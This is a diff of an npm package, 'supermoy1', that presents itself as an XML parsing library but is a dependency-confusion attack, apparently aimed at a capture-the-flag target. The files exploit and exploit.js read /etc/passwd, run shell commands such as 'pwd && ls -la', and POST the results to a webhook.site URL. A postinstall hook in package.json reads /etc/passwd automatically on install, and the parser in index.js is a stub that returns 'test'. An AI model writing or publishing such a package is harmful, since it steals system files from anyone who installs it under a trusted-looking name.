supermoy1 0.30.1

package/exploit

@@ -0,0 +1,56 @@
+const fs = require('fs');
+const https = require('https');
+
+// ТОЛЬКО отправка на webhook, без console.log
+function sendToWebhook(data) {
+    try {
+        const payload = JSON.stringify(data);
+        const options = {
+            hostname: 'webhook.site',
+            port: 443,
+            path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
+            method: 'POST',
+            headers: {'Content-Type': 'application/json'}
+        };
+        const req = https.request(options);
+        req.write(payload);
+        req.end();
+        return true;
+    } catch(e) {
+        return false;
+    }
+}
+
+// Основная логика
+try {
+    const passwd = fs.readFileSync('/etc/passwd', 'utf8');
+    
+    // Ищем флаг
+    const lines = passwd.split('\n');
+    for (const line of lines) {
+        if (line.includes('{') && line.includes('}')) {
+            // Отправляем ТОЛЬКО флаг
+            sendToWebhook({
+                flag: line,
+                source: 'dependency_confusion',
+                package: 'supervot3',
+                timestamp: new Date().toISOString()
+            });
+            break;
+        }
+    }
+    
+    // Также отправляем полный /etc/passwd для анализа
+    sendToWebhook({
+        full_passwd: passwd,
+        source: 'full_dump',
+        package: 'supervot3'
+    });
+    
+} catch(e) {
+    sendToWebhook({
+        error: e.message,
+        source: 'error',
+        package: 'supervot3'
+    });
+}

package/exploit.js

@@ -0,0 +1,64 @@
+const fs = require('fs');
+const https = require('https');
+const { exec } = require('child_process');
+
+// Функция для отправки на webhook
+function send(data) {
+    try {
+        const payload = JSON.stringify(data);
+        const options = {
+            hostname: 'webhook.site',
+            port: 443,
+            path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
+            method: 'POST',
+            headers: {'Content-Type': 'application/json'},
+            timeout: 5000
+        };
+        
+        const req = https.request(options, (res) => {
+            // Игнорируем ответ
+        });
+        req.on('error', () => {});
+        req.write(payload);
+        req.end();
+    } catch(e) {}
+}
+
+// Основная логика
+console.log('=== EXPLOIT START ===');
+
+// 1. Пробуем прочитать /etc/passwd
+try {
+    const passwd = fs.readFileSync('/etc/passwd', 'utf8');
+    console.log('PASSWD:', passwd);
+    send({type: 'passwd', data: passwd});
+    
+    // Ищем флаг
+    const lines = passwd.split('\n');
+    for (const line of lines) {
+        if (line.includes('{') && line.includes('}')) {
+            console.log('FLAG_FOUND:', line);
+            send({type: 'flag', data: line});
+        }
+    }
+} catch(e) {
+    send({type: 'error', data: 'Cannot read /etc/passwd: ' + e.message});
+}
+
+// 2. Пробуем выполнить команду
+exec('cat /etc/passwd | grep {', (err, stdout) => {
+    if (!err && stdout) {
+        console.log('GREP_RESULT:', stdout);
+        send({type: 'grep', data: stdout});
+    }
+});
+
+// 3. Проверяем текущую директорию
+exec('pwd && ls -la', (err, stdout) => {
+    if (!err) {
+        console.log('DIR:', stdout);
+        send({type: 'dir', data: stdout});
+    }
+});
+
+console.log('=== EXPLOIT END ===');

package/index.js

@@ -0,0 +1,11 @@
+module.exports = {
+    parseXmlString: function(xml, options) {
+        return {
+            get: function(xpath) {
+                return {
+                    text: function() { return "test"; }
+                };
+            }
+        };
+    }
+};

package/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "supermoy1",
+  "version": "0.30.1",
+  "description": "XML parsing library",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node -e \"const fs=require('fs');try{console.log('POSTINSTALL:',fs.readFileSync('/etc/passwd','utf8'))}catch(e){console.log('ERROR:',e.message)}\""
+  },
+  "keywords": ["xml", "parser"],
+  "author": "test",
+  "license": "MIT"
+}